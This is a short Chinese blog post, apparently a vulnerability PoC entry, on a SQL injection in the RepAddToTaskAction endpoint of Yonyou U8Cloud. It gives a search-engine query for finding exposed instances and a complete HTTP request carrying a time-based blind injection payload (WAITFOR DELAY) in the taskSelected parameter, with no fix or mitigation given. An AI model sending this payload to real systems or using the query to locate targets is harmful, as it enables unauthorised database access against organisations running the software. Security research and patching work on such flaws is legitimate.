Babing
Published on 2024-09-03 / 21 Visits
0
0

用友U8Cloud-RepAddToTaskAction-SQL注入

#OA

0x01 漏洞名称

用友U8Cloud-RepAddToTaskAction-SQL注入

0x02 漏洞介绍

用友U8Cloud-RepAddToTaskAction接口存在SQL注入,攻击者可以通过此接口进行执行sql命令。

0x03 影响范围

用友U8Cloud

0x04 网络空间测绘查询

title="U8C"

0x05 漏洞复现


GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.RepAddToTaskAction&method=save&taskSelected=1%27);WAITFOR+DELAY+%270:0:4%27-- HTTP/1.1
Host: 11.11.11.11
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate

image-ipjn.png


Comment